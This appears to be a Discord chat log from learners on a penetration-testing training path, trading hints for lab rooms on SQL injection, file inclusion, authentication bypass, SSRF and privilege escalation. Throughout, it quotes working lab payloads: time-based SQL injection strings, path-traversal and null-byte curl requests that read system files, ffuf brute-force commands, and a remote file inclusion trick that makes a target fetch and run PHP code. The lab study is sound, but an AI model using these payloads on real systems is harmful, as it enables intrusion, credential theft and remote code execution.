#junior-pentester-path
damn, if this is introductory... some of these questions really make me question my abilities
Worked for me. You sure you have the right flag? I know there were other flags that weren't the correct ones displayed when I did it
That room is more frustrating than fun. There's multiple flags in the XHR...
It's not. It's an intermediate level pathway. It covers all the introductory material
' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--
SQL Injection task 8. Entering this is giving me an error. What am I doing wrong?
Nevermind
I'm beyond dumb
i'm gonna guess column_name, tho i haven't gotten to that point yet
No. You'll get there. I'm just dumb
hey guys, quick question about SQL injection task 8. I found the answer but not the way I wanted to. I found the database's name by doing: || referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'sql__four%';-- || So then I moved on to how to get the table's name. So far I tried to do: || ' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sql__four' and table_name like '%' ;-- || but by doing so I was not even getting the 5 sec timer. Why?
check dms
I then just basically guessed that the table's name was || users || anyway and then proceed to a boolean based injection but I would like to understand why I wasn't able to get the table's name tho
ok
ye got it. Wasn't used to SQL syntax yet
Anyone mind pointing me in right direction for Authentication Bypass Task 3? When I try to brute force username/password field, it only tests the first username I have in my list and not the others. I'm tempted to do only one at a time and change the list, but did anyone else figure out how it can test all of the usernames in the list?
did you verify the syntax of your ffuf command?
Yeah it's working. I see it testing the first username but the other 3 it doesn't. I've tried different delimiters with commas but it never goes to the next one. Just tries the username/pass combo of the first username
ah, maybe try putting the names in "valid_usernames.txt" on separate lines
like
this
for
example
Yeah I tried that first lol. Dang, is that what everyone else did??
Double checked it and still didn't work. Stops after testing the first username. I'm not sure at this point, I'll just remove the first username and keep going until I get it
Thanks for the help! @upbeat magnet
Gave +1 Rep to @upbeat magnet
oh well, good luck 😄
I figured it out! I guess something was up with the file. I'm guessing it was because I output my original ffuf command with the redirect operator into valid_usernames.txt. When I went in to check on it the first time I had to clean stuff up because there were weird encoding things there. I deleted the file and put the usernames in there and everything worked.
aayyy! gj!
can't wait for you to join me on the challenges in "file inclusion" so we can suffer together
I did the first 2. I cannot for the life of me figure out the 3rd
Well I'm probably up all night, so I'm sure being super tired will make the suffering that much more enjoyable
well, i figured out what keys are allowed and the blacklisted ones, so that's a start
Oooo. How'd you manage that?
brute forcing it with everysingle key on my keyboard over and over again
I refuse
Please do
||basically nothing but lowercase keys work. try it out. only normal lowercase letters||
i'm trying to figure out how to:
- bypass the blacklist or
- navigate the directories with only those keys
If only lowercase letters work it's likely a whitelist
Not a blacklist
tru
but still, how do you bypass that
actually, i might have an idea, but it's super far fetched. I'll try it out after i sleep
Can someone give me a nudge for the 3rd LFI challenge?
Last flag on the Walking an Application room
I have "a" flag that is in the response header - but when entering it (manually and c/v) it errors on me - maybe too long in front of the screen today......
||Check all of the fields/sections in the right side. I had that issue too, but there’s another flag there besides the response.||
Yes sir - nudged in the appropriate direction - thank you (and a thank you to @jolly vine as well)
Gave +1 Rep to @undone mirage
is something wrong with task 9 linux priv esc?
can't get the reverse in the cronjob
@modest arch same..i've been doing this for like an hour
i set it to do a basic task and doesn't seem like the job is working at all
yeah..i tried a lot of things, and still no luck
maybe the test.py with a python3 reverse shell
i will try that in an hour or something xD
haha gl
Hi. The link https://lab_web_url.p.thmlabs.com/ isn't opening at all. Any clue what might be the problem?
PS: this is task1 of 'Walking an application' room
When I do a nslookup on thmlabs.com, it says can't find an answer
hahahah
so that will update
when you've started your vulnerable machine
it should look like https://10.10.(number).(number).p.thmlabs.com
Yeahhhh my mind has melted today
I've been tryharding it on and off since 9am and needless to say I'm exhausted, gonna hit the hay having done about 50% of the path today
recommended time to complete: ~50 hours 😂
It is not a straight copy and paste for the URL - review the source and look at the URL there for a possible thread to unravel
Hello, I was doing the jr pen test learning path, module 2
Intro to web hacking. I found 1 flag that was never used
comes into play later
I was doing jr pen test stuck at lfi flag3 which doesn't accept any special char or number
A small hint please thanks
Ok ty
Hello, I was doing the walking an application room and am stuck at task 3, 4th question, which says what is the framework flag?
Any hint?
In frameworks there are always some changelog and documentation, I recommend you to check them.
Where are they?
There is one url in source codes comment, related to thm check that URL
LET'S GET DEM TICKETS
Anyone try Windows PrivEsc room under junior pentester path https://tryhackme.com/room/winprivesc?
Am I overlooking something, or is the room missing creds? For task 2 - information - the machine does not have creds given?
It said the task 2 machine is the same as task 4; I checked task 4, there is no initial cred given there either
help me for doing so
or finding the answers
oh.... thankss 🙂
Guys, small check here: on the last one in XSS I am not getting a response back from staff, waited for a long time. Btw I was able to get a response back from my own, so the payload works
@dreamy sundial I'm on the same step, getting the same issue. No response
@tawny flame let me know if anything comes up, will do the same
I'm trying both approaches, both with nc and with the THM Request catcher
I’ve got the response but answer won’t submit
@twilit chasm have you decoded the response?
Yeah
@twilit chasm if you open the ticket yourself you will get your session cookie
XD
Hope you didn't do that
all path done, calling it a day, have fun guys!, no luck in tickets bastards xD!
if you guys need help just dm and will answer when i can
How long you waited
I opened up the ticket, just clicking around,
never got it with using netcat
Opening the ticket only gives you your own cookie right?
Like yeah just getting pentester title and streak freeze tickets
2 rooms left only, this path only taught me how unlucky I am🙂
I did but it didn't work
Can you send how you are decoding it?
Yeah I only get my own session cookie back when I open it but don’t get a response if I don’t open the ticket
Me 2
I reset the box and got it first time
any progress on this question?
same thing, stuck there and I can't really think of a way to get around it rn
still no progress, any hints for the filter bypass? i tried with encoding, doubling the path and backslash but still nothing
@sly fiber dm me
guys i need help with authentication room task 4
Wait a bit. webserver need time to load
It's not that bro, it's been working, and I reloaded and now it's not.
Ugh so annoying, I was just getting a good flow 🙂
it's some issue there, do one thing terminate that and again start that then it should work I faced the same issue 2-3 times.
Tried both firefox and chromium, been trying for 30-35 minutes now..
Task 3 of Authentication room, isn't showing valid creds
@modest arch are you using your own box + vpn?
no vpn, just started the machine in the exercise
im talking about your way to access that machine, are you using the attackbox?
No, there was no need to do so in the exercise before, and no instruction to do so in this one. I'll try it.
I was accessing it just fine through the browser @cobalt tundra
but you accessed only the previous one (walking an application) through the browser, not the next one (content discovery). correct?
I have a doubt in introduction to web hacking module there is the room called authentication bypass where we are using ffuf for brute forcing
guys, have anyone got any problem submitting the last flag on the room walking an application
i found the flag, but it does not accept it
And there is the syntax of ffuf like we are using valid_username.txt
But where is the valid_username.txt file?
not sure if there's a flag for ffuf to create it on its own, the output from the previous command was so short i just created it myself by hand
Have you got that flag @cobalt tundra
Hi All - I am just doing the Authentication Bypass room and I am on Task 3 in which I need to bruteforce with ffuf. I am running the command with the right syntax however no usernames / passwords are being displayed.
Anyone else had the same issue?
you have to create the file with usernames that you've found
I've done that
Ohh thank you @modest arch
Gave +1 Rep to @livid drift
can you take a screenshot?
Can someone give me nudge on lfi challenge 3
I don't understand this sentence 😅
Sorry. For some reason, I can't seem to upload the screenshot
Can someone help me I'm on the File inclusion room at the challenge level, trying to get the first flag .I already tried a lot of things including what I think should get me the flag but it's not working.
.
Did anyone get the 3 oscp tickets
should be straight forward
using curl with post, passing data in
I have exactly the same problem. First flag can't get it.
Tried with burp. When i change get to post response is the same
I added file as well. Not even a error
LFI*
need help in task 8 of sql injection
hey man, did you find out what you did wrong?
you have to use the task7 method combine with SLEEP(x)
Stuck at same spot, task 8
Has anybody tried the curl commands from "Authentication Bypass" task 5 lately? The description says curl -H "Cookie: logged=true; admin=false" [URL] should return "Logged In As User", but I get "Not Logged In" all the time. Tried multiple times, different machines, triple-checked the IP every time. (Working from AttackBox)
my description says logged_in=true, typo on your side?
Finally. Open the website with web developer tools / inspector (I'm using firefox). Then find the form action with method GET and change it to POST. Then write in the file name field the windows file you are looking for
No, I just checked again, it says "logged=true" in the assignment. But let me try this out with logged_in, brb.
That was the only way I was able to get it as well.
I understood 😅
"Principles Of Security" Room, Task 5.. I think the positions of Identification and Preparation in the diagram are inverted, what do you think ?
||curl -X POST HTTP-URL -d "file=../../../etc/flag1" | tee task8-flag1.txt||
this is another method
ok, it worked with logged_in. Thanks!
Gave +1 Rep to @cobalt tundra
maybe some older cached version or something 
null byte
Lol just realized I used the wrong curl switch
I'm having nightmares with File inclusion flag 3, everything I've tried out is filtered
then a browser might not be the right tool for the job
thanks for that
Gave +1 Rep to @onyx plover
i got user and dbs names but havent solved task 8
have you gotten the password for the user?
nope
try to get the password? it will be the same as how you got the username
Anyone here who completed windows and linux privilege escalation one?
U also stuck on these 2?
just finished
Can you help me with linux privesc, with that cronjobs part?
Its not triggering my reverse shell or any other command in backup.sh
you will need to put the script in the right directory
In home?
if i recalled, the script is right at the home of user
just ensure your reverse shell script does include shebang line
Stuck at file inclusion challenges, any help? flag1 no luck, POST /challenges/chall1 no luck, with chall1../../../etc/flag1 no luck
See the error, the function may be adding something at the end you can remove with a special byte. Solution: || null byte %00 ||
Check the permissions!
ye, it's lab 2 I'm stuck at, first it says change method to post: "The input method is broken. You need to send POST with file parameter". I tried with burp, nothing
1st challenge requires apart from changing the method to POST to add that special byte at the end of the ../../../etc/flag1
I must be blind as I can't find some flags
and its so simple I feel stupid for not finding it
Want a hint for 2nd challenge?
I imagine its related to changing the cookie value?
It's the 3rd one that's mindbreaking
Yes
POST /challenges/chall1.php?file-file../../../etc/flag1%00 Nothing
ive changed it and got presented with the admin page, stuck there
Are you doing via curl or modifying the page source?
with burp
I did it modifying the page source and I had no problems
Although here it's should be file=../../../(...)
Check the response, maybe the cookie value is being used for something else apart from checking which user you are
I just got the 3 LFI challenges done. Any tips/resources for RFI? Not sure where to start
i had a leftover flag from a task, weird
Post /challenges/chall1.php?file=../../../etc/flag1 Nothing
got the same
hit a brick wall after that stage
Null byte is missing now
even curl -v http://ip/challenges/chall1.php -X POST -d 'file=/etc/flag1%00' -o flag1.txt
Found out the flag i got was for a later task, somehow got it before i had to
no with null not working
I don't remember if there was an error msg after that but here is a bigger hint: ||cookies can also have lfi vulnerabilities||
The ../ are missing, try modifying the page source code, it's much much simpler. You may also want to capture it with burp so in case you miss the first one you can repeat it with the repeater
Can you halp me with the 3rd one? I can help you with the RFI
I am not sure on how to bypass the filter on the 3rd challenge
||I got it with curl and POST||
just need curl to output to stdout
It was much simpler than I thought xD for RFI: ||you can include files from other servers so setup an http server on your machine with a txt file with the malicious php code|| if you need more help you can dm me
Thanks, i've tried changing the value to ../../ etc but it just increments the directory. i've tried changing the Path for the cookie but that just generates a new one. I can only assume it's the Value filter only that needs changing
Gave +1 Rep to @unkempt root
It has that line
then the permission, as fellow mate mentioned
no execute right
You must take into account that the include function is already inside a directory || so instead of 3 ../ you'll need 4 ../ ||
ur welcome 🙂
nothing working, can you give me the answer plz for lab1
1 sec, I'll send it to you via dm
Can you give me a nudge as well?
do you have to do something to "activate" the title?
does any one got the OSCP ticket even single time?
Go to your tickets, if you have 3 you can activate the prize
ye, i activated it, it just doesnt show up/change
Anyone have any hints for flag 3 of LFI?
there was a popup after activating it, but i clicked it away without reading :)
that enough
||post||
huh, i took a different approach to flag3
||i gave up with FF and went the cli-route||
guys need answer plz LFI2 Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
Is there a way to kill all current running machines on the homepage?
#general message
Had the same question earlier
seems like quite the unintuitive and hacky way
Nope
i got 1/3 OSCP
any help with LFI flag 2? using curl
nothing is working, just like the flag 1
THM=../../../../etc/flag2%00
guys how can you get
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
||You follow the rfi guide. You need a file and a server||
i made this and nothing cmd.txt --> '<?php echo shell_exec('hostname');?>'
'python3 -m http.server 8080'
input: 'http://10.10.153.7:8080/cmd.txt'
Yeah I'm having a little trouble with that too, I've got my file uploaded but it doesn't seem to do anything when I inject the URL. I even tried the Hello THM code from the RFI example and that doesn't seem to work either
Can you help me with the LFI room?
Twice
nice, all boxes done or some left?
3 left, I think
I don't know what im doing wrong with the Logic Flaw task
ive done everything it asks, but cant get a flag
curl -v http://ip/challenges/chall3.php -X POST -d 'file=/etc/flag3%00' -o flag3.txt
My machines in the JPP keeps timing out, anyone else that has that problem?
not working
i feel stupid for not working this out
Don't feel stupid @modest arch I'm in the same spot 🙂
For task 3 question 3 of walking an application from what I can tell I'm supposed to open a directory in the web browser to find the file. How do I do that. Brand new to this
on Authentication Bypass?
on the LFI flag3 task
Add to the URL
can i get a hint on how to get to roberts support ticket
been reading through the page and trying anything i can think of
2/3 now
Anyone currently doing LinuxPrivesc module?
Crontab is not running every minute as stated....
@buoyant dagger sorry if I'm not supposed to ask but for clarification I am not sure what to add and I do not know what a directory listing is. I've tried adding /directory. /file.txt. to the home page and to page source
Need help in this one…. Any suggestions,
Check the images in the page source, you might have missed something
how to list out directories
You can use gobuster for that
and man/tldr can help with gobuster
gobuster/dirb/dirbuster
Stuck in this “Burp Suite: Repeater”😑 suggestions are welcome
dirbuster is old. Not recommended
Man, I can't get this RFI example to work even. I've got my HTTP server up and I can see the site making the GET requests but it's not printing anything...
lookup php passthru for the php .txt file on your machine
is anyone stuck on the file inclusion challenges????
Read up a bit in the chat, loads of us were stuck earlier and there's some good hints
check permissions of your script
Stuck in this “Burp Suite: Repeater”😑 how to get 500 internal server I’m getting 404 after messing with numbers
Maybe your numbers are going the wrong way? 😉
how long does this take to give the right cookie
You have to do it blindfolded
Any suggestions… ¿ I tried every single fucking way 😵💫
will this work if i add some php file like cookie grabber or its still the same with the given payload there
i cant remember what eventually worked for me but i remember trying some under 0 some above 999 and even some non-numbers and eventually got it
misread your question, it should be instantly
no php required, all you need is already in the description
i can get response if i click the request ticket so i guess my payload was wrong
@knotty belfry Thank you for the help, I still don't know what to do with the info you have given me. I think its safe to assume my current level of knowledge is not up to this learning path yet. What paths should I be able to do first so I can complete these?
Gave +1 Rep to @knotty belfry
@cobalt bramble start with pre-security then complete beginner and then web fundamentals
Please give me a hint on question 2. I have all the others done and I don't see it brought up in the past
@surreal narwhal Thank you. I'm on the tail end of Pre security now
Hey, im stuck since 1hour on this question in the Local File Inclusion room, challenge 1, can anyone help?
I tried to modify the GET request to POST and tried path traversal ... nothing works
Yep, come back to it in a couple hours or a day so you have a fresh look and keep my hint in mind, it will dawn on you, I'm sure of it. As the saying goes, try harder!
Thank you! Not sure I would have ever tried that.
Gave +1 Rep to @steel nymph
I would recommend using curl.
holy shit i got it
@crimson lark thanks, i didn't use curl, i just realised i had one "../" too few
Gave +1 Rep to @crimson lark
such a stupid mistake
if it makes you feel better i've used curl, burp and dev mode and still haven't figured it out.
Were you editing burp?
hi, all on the linux priv esc module - priv esc sudo task.... there is no gcc available to compile the code.
@indigo axle do it on your attack platform. I assume your talking about the one with mounted shares
@crimson lark @charred wagon no, you don't need burp, you need to edit the form in dev mode, the method and the action
got it thanks just need to use attack box
Gave +1 Rep to @cobalt tundra
@digital pendant this one is making me feel dumb
its the LD preload section (Privilege Escalation: Sudo) im doing it on my own box
( i ssh as "karen" into the victim box)
I'm right there with yah
Compile the script on your own kali machine and then transfer it over with an http server and wget
honestly a few of these had base64 with suid bit set and i just used that where i could
ok brill thank you @drifting drum
Gave +1 Rep to @drifting drum
Yea. Same here
Lol
@charred wagon i wrote you a pm
I've edited the method to post and change the file to the path. What am I missing?
Could you copy me in that
idk if this is allowed?
What do you mean?
same haha
@crimson lark you can ask @charred wagon , i just showed him
can anyone help me with this, i am unable to find it in the path
/h...
I think it's a known issue.
use the site in the task
..
the link is of the website itself
ok
+1
got the answer
@nimble turtle mind if i dm
I need gentle hint on room SQL Injection for Task8
On Linux privesc NFS room does it matter which one you mount?
I am getting OK for all the query execution. I am referring to TASK7
You can dm me
is curl the only way or can you do it with dev tools or burp?
worked for me
Must be doing something very wrong then
with dev tools the null byte won't work. thats why i'm wondering
do you know if task 9 is working properly? the cron job didn't seem to run, 0 reverse shells, tried also with the .py file, same
k will check that
gotta say I love this path
- the linux prive esc tab is saying "connection error try again in 15" i've already rebooted the thing but same issue if anyone have an idea
just try to ssh
same for me lol
...it worked for me
damn @robust steeple by bash or python ?
i've tested 3 bash reverse shells, none of them seem to work
that's why i think the crons are down ^^'
which cronjob you trying? it worked on one for me but not the other
pretty sure thats how i did it
hummm you used the revershell provided in the course or an other one ?
yeah the python revshell
This is probably a dumb question. But is there any reason you have to wait for the cronjob to run? Can you manually run it?
check your permissions
You could manually run it but you'd get the same privs you already have
I'm not sure I've completed this task the intended way.
@robust steeple you can, but the main goal here is to make root run the cron; this way when the reverse shell pops you will be logged in as root
Yeah, I got root another way apparently. Thanks though.
Anyone know why the RFI wouldn't work in my kali VM but worked perfect in THM's kali box?
Is there anyone who really got any vouchers for ejpt or oscp
nah man, ig they designed it not to be achievable
done 69% and after a while it started to give the same bad things like title and freeze
at the begining it was nice but afterwards they dont give a damn thing
the linux/win priv esc
so sad rlly
we got scammed ig
yeah me too
They shouldn't do this
XD
good luck man
after that ... just small vouchers, duplicates and so on
All I am getting is that stupid pentester badge
prob not gonna get anything but good luck
exactly
if you look ... no one officially won those nice prizes
no swag discounts
i think we must wait till the end
$7k it seems
i think we must wait till the end
Ya let's see
studied the content for nearly 10 hours
waiting or not ... it is not stated that they release them daily or something like that
yeah, at least the path was a big push in learning 😄
that's the great win for all of us
yeah but maybe they are planning to do so
imo didn't learn too much, only small details
didn't learn such mind blowing knowledge except for burp macros
guys can you give me the answer to SSRF Examples Task 2
Dude you can't ask for ans in here
Let us know where you are struggling
maybe that's why they don't give it this easily
to eliminate the voucher hunters only looking for vouchers without understanding or working on the topic
cool story kid
im stuck at https://server.website.thm/flag?id=9&x= thats not working
good question kid
I got emailed a swag discount
same 3%
Guys, in SQL Injection task 8 ... I am not getting an answer
You're gonna have to give more info than that
There's a multitude of reasons that could cause it to not work
referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--
Follow the enumeration of task 7
every combination of % is giving me true
This hint is wrong, follow the paths of task 7
okay !! let me try
Same but with sleep
Because admin123 isn't your referer. Reload the page and look at what the referer is supposed to be
tryhackme
Yea. So swap what doesn't belong with what does belong, and then that hint will get you started
referrer=tryhackme.com' UNION SELECT SLEEP(5),2 where database() like 'u%';--
so the final sql querry ::
select * from analytics_referrers where domain='tryhackme.com' UNION SELECT SLEEP(5),2 where database() like 'u%';--' LIMIT 1
still executes in 0.001
Well, that exact query won't work. Because the database name doesn't start with a u. Now follow the enumeration process detailed in task 7
Sorry to butt in but can anyone help me with the Linux PrivEsc room? crontab reverse shell just will not connect.
Same here!
It'll take a while
I haven't gotten there yet
referrer=tryhackme.com' UNION SELECT SLEEP(5),2 where database() like 'sqli_four%';--
Need some help with LFI flag 2. Got 1,3,4, but 2 is killing me. I have ||Curl -X POST -d 'file=../../../../etc/flag2%00' http://IP/challenges/chall2.php -H "Cookie: THM=admin"|| ... all I get is "This is a admin web page! Get the flag!"
ok, you're halfway there. ||now play with the cookie value a bit more. See what happens if you add stuff after admin||
@coarse marsh Most frustrating crontab exercise I have done.
Absolutely, i've been stuck since yesterday, tried a lot of things with no results.
Have you tried the TryHackMe request catcher or attackbox? I had a similar issue on VPN a few days ago
i don't think it's a vpn issue, i tried to get a normal reverse shell and it worked, the problem is with crontabs i think.
@upbeat magnet Got it, thank you!
Gave +1 Rep to @upbeat magnet
Hello Everyone, I am stuck on Task 8 of https://tryhackme.com/room/xssgi. I entered the payload and started a listener, but my browser is failing to execute fetch. Any ideas what to do? 🙂 Cheers
I was having trouble with it earlier, might have to do with the VPN and/or Firefox. Try using the AttackBox instead, it worked for me
anyone got a hint for file inclusion lab3 ?
I got it! I am not sure what was the fix but message me if you want
Thank you for advice, but I found the problem was that I left the IP inside {}
🤷♂️
Gave +1 Rep to @fiery dirge
Hey guys, im doing the inclusion lab 1
I understood the concept in my head but i just can't seem to know what to write
Im stuck
Dm me if you need help
Sure
im stuck on the lab3 in file inclusion, anyone got a hint for me?
Hey guys, I'm trying to do task two of the SSRF room and the example is just different enough from the task that I cannot wrap my brain around it. Any hints would be great
Task 6 of the same room may have the answer you're looking for
@hollow acorn yeah but i don't have a webserver to host the file?
I would look up how to set up a temporary web server using the command line
i just got it with curl 😄
Awesome!
@hollow acorn Thank you!
Gave +1 Rep to @hollow acorn
Take a really close look at part 4 and the hint
Your input is going to be structured similarly
If I add my input to the end, it attempts to reach for both item 2 and the flag. Do I insert my command before item 2 or can i enter the command after?
Hey so I'm stuck on task 5 of the Linux Privesc room. I can't use nano or wget to get the kernel exploitation code on the target machine. Has anyone else had this issue or am I missing something?
||After, and you need to use &x= at the end||
That’ll do it
anyone wanna do the File Inclusion Playground?
Compared to the LFI challenges, the playground challenge is easy
"$ wget 10.9.5.54:8000/LinPEAS.sh
--2021-10-20 16:25:49-- http://10.9.5.54:8000/LinPEAS.sh
Connecting to 10.9.5.54:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 459310 (449K) [text/x-sh]
LinPEAS.sh: Permission denied
Cannot write to ‘LinPEAS.sh’ (Permission denied)."
This is what I have "https://website.thm/item/2?server=api.website.thm/flag?id=9&x=". When I enter that I get an error stating 504 Gateway Timeout. What do I need to modify in the url to get it to work?
that's the error I keep getting when using wget
Take another look at the URL you're trying to get to
That worked, I'm an idiot lol. Thank you!
I modified it to api.server.website.thm but that didnt work either?
Do I need the https at the beginning?
@drifting drum is it solvable without a webserver?
Are you sure I don't need to add the flag url before the item url? It seems to want to get both and errors as a result
Python has a useful module for that
^
What kind of vulnerability seems to affect the Fitbit application?
found the vuln but i dont understand what i'm supposed to write (not english native is not helping much tho)
Python has a module for that. Try googling it
You're close, look at the target URL again
You're not trying to get to api.server.thm
Hello guys, anyone solved "File Inclusion/Task8/Challenge3" ? I'm running out of ideas...
Ah, the fact that api was included in task 4 really threw me off. Thanks so much!
Gave +1 Rep to @opal stirrup
Yes. What have you tried?
Can I DM you ?
Sure
"In Lab #2, what is the directory specified in the include function?"
I did not understand that
what include function
For anyone stuck on flag 3 of the challenge in file inclusion, it is very similar to task 6 in the same room
Look at the errors it gives when you input incorrect data
The website is timing out i guess there is a lot of activity
nevermind my internet is shit haha
Lol
👍
Quick question. Is the answer for task 3 of the SSRF room in the information provided or do I have to research to find it?
Just kidding, I found it
Thanks for the help everyone. I'll hop on a bit more later 🙂
Man everyday i notice how much i don't know and its scaryyyyyy
can anyone help me with the file inclusion playground? i don't understand this
like i got the webserver running but how do i upload a file ??
Knowing what you don't know is better than not knowing what you don't know
You don't need to. If you used python then all the files in the directory that you started the server in are automatically being hosted on the server
@drifting drum you mean i can mv my file locally and it will be on the server?
oh fml, of course bc the webserver has no database, lol i need to go to bed
😂😂
@drifting drum in which directory would that be ?
Whichever directory you started the server in
there it is! thank you @drifting drum i think i can do the exploit
Gave +1 Rep to @drifting drum
guys help with payload in command injection
What are the contents of the flag located in /home/tryhackme/flag.txt?
Np
yes curl id whoami not working
@drifting drum actually no, can you help please?
With?
well i "uploaded?" the file to the playground by adding ?file=http://my_ip/my_file.php
then i wanted to execute it
@drifting drum thank you so much for the help!
Gave +1 Rep to @drifting drum
rep point just for you ❤️
what command could i use to find the most common size from the size field in a file like this
That's detailed in the task
i paste commands from the cheat sheet, they're not working
@drifting drum yeah i tried it like that
I'm at task 5 Local File Inclusion. Any pointers on first question?
got it tnx
Anyone done Metasploit exploitation Task 6, keep getting Segmentation fault (core dumped)
while running the payload
It won't let me enter ANY character except letters? Any help
whats a "Throwback voucher" ?
How do I use the premium vouchers and stuff
Is someone able to PM me about the LFI challenge as I have followed the guide and no luck and want to check the answer I have?
task 2 of ssrf room help needed
Hey, in the new junior pentester path, there are 2 privesc rooms. The Linux one works really fine and the credentials are given in the room, but there is no user or password in the Windows room: https://tryhackme.com/room/winprivesc . Is this normal? It seems rather complicated to get an entrypoint on this compared to its Linux equivalent.
hints needed please
Anyone help with LFI #2 question 5, sry.
:p thanks, I've tried bunch of those but...
in sqli found martin password but can't find flag, i'm blind
Speaking of that… I’m stuck on challenge 2 - I’ve got the cookie bit but I can’t move
I think what I'm getting down there is correct but it's not working
not getting what's wrong
me 2
can I put the "Server requesting" url here and mark it as spoiler?
thanks it's solved now
Gave +1 Rep to @steel nymph
Any hints?
What do you mean about playing with cookie?
Change from Guest to Admin
Received another page
besides admin?
thanks
Gave +1 Rep to @steel nymph
Already tried a lot
this way I got an error
error
Current Path
/var/www/html
File Content Preview of teste
Welcome teste
Warning: include(includes/teste.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
Warning: include() [function.include]: Failed opening 'includes/teste.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37
Current Path
/var/www/html
File Content Preview of ../../../etc/flag2
Welcome ../../../etc/flag2
Warning: include(includes/../../../etc/flag2.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
Warning: include() [function.include]: Failed opening 'includes/../../../etc/flag2.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37
included the escape (%00) but it doesn't work
Sorry for not answering sooner. I'm back now. Were you able to get the flag?
Yes I was thank you 🙂
Gave +1 Rep to @hollow acorn
Glad to hear it! Great job!
@drifting drum i am stuck with "File Inclusion/Task8/Challenge3" can you please push me to right direction ?
thks @steel nymph !
can someone help on ""File Inclusion/Task8/Challenge3""
i tried POST as well...
any small hint will be helpful... 😉
can i DM...
@steel nymph I got the /etc/passwd on 2 question lab 4 but dont understand what function is making the directory traversal?
in time based sqli payload https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- not working help
thanks 🤦
Gave +1 Rep to @steel nymph
thanks a lots @steel nymph...
Gave +1 Rep to @steel nymph
I let my subscription lapse but started doing this path once I saw it released. I finished a couple rooms and got 1 ticket from each. The pop-up says you need to subscribe to get an extra ticket. If I subscribe now, will I get the tickets I missed out on?
heyyo, I'm having some trouble with inclusion. Doing the first LFI challenge, || I know that I need to change the GET request to a POST, and have tried to do so both in dev tools in firefox and with burp. It seems to just respond with a normal webpage as if I had just sent a get request... any ideas? ||
https://httpie.io/docs is a great tool to have playing around with forms
I even did it manually with curl 🤦♂️ still the same thing, just a normal response
|| curl -d "file=/etc/flag1" -X POST http://10.10.75.195/challenges/chall1.php ||
anything wrong with that command? @fading pulsar
nvm I'm just dumb 😂
trying to grab /etc/flag1 without dotslash
not dumb when you catch the mistake 😉
Gave +1 Rep to @steel nymph
Hello! I'm on task 2 and I ran the command user@tiny bluff$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
Is it supposed to take forever?
It's been scanning for 20 min so far
just did it now, 13 sec
well i must be doing something wrong
Linux PrivEsc Task 10
Can someone give me a nudge as to what's odd in PATH? I honestly have no idea
I'm probably just blind, but I'm at a loss here
What's the exact command you put in?
@drifting drum error in the text there... check the forum
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
Hello, I'm working on walkinganapplication room and I can't find the first flag (which is supposed to be in the comment section).
Wow. They asked the complete wrong thing lmfao
That seemed to work
thanks
hehe, yeah
@drifting drum i bugged a long time before i checked the forum, tried everything
This PATH one has me still a bit lost even after the forums..
I am understanding the theory but in practice I fail
They didn't do a good job with the questions for that one
LFI challenge 3 is making my head hurt ngl
They filter all special characters and numbers 😂 guess that's what makes it fun
Not everything is filtered 😉
yeah found that out but still I can't get root no matter what I try
I'm working on it now. Will let you know in a little bit. Pretty sure I know how to do it
If you can lend some insight I would love that. ||I can't compile on the machine and a file transfer loses its suid bit.||
don't need suid, it's about the path 😉
JaRam can you message me for a second?
sure
So um... I did a thing
I'm not entirely sure how, but I was able to read the flag without getting root
Someone needs to have a serious look at this task lmfao
Hmm, 644 instead of 600, dunno if its intentional haha
@steel nymph I have admin page after editing cookies a bit. But can't seem to find anything useful here?
It's most definitely not
The questions for that task are messed up too
Anyone done the time based sql one in https://tryhackme.com/room/sqlinjectionlm I'm hitting a blank. Can't seem to find a column name?
What are you trying?
||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'a%';--||
You're using the wrong information_schema
You can't find columns if you're looking at tables
Np
Me too. Someone help please, I can't finish the path because of this
think i'm stuck again sorry, trying to get the username. is ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 from users where username like 'z%';--|| the right syntax?
ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.117.78/customers/login -fc 200
posted this in task 3 which is the given command
I changed it to match my username txt file I made from the previous task
I seem to be getting no results with this
here is the screenshot
Any help with first challenge File Inclusion task 8?
Looks like it
i dunno what i changed, but now ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'username%' and column_name!='password%' and column_name!='id%';--|| is working
@raw bolt have you verified the contents of usernames.txt ?
yeah when I did the command in task 2 I did >> usernames.txt
but then I just went in there and deleted everything but just the names. Still nothing
hmm... I had some issues at this point as well... just checked my notes and your screen shot looks right, I did reference my usernames.txt ./usernames.txt. But I would think you would get an ffuf error if it couldn't find the file
got it now, big thanks 🙂
Gave +1 Rep to @drifting drum
It's weird
and there are no walkthroughs online for this course.
checking my notes to see if there are any other hints I can offer
ok ty
does my command look right? Its in the first screenshot I linked.
it does. I know I had issues when I mis-typed the Content-Type
🙂
no, dogs make me laugh
Anyone have trouble getting the last flag on the XSS challenge?
I'm firing that vm back up and checking it out @raw bolt
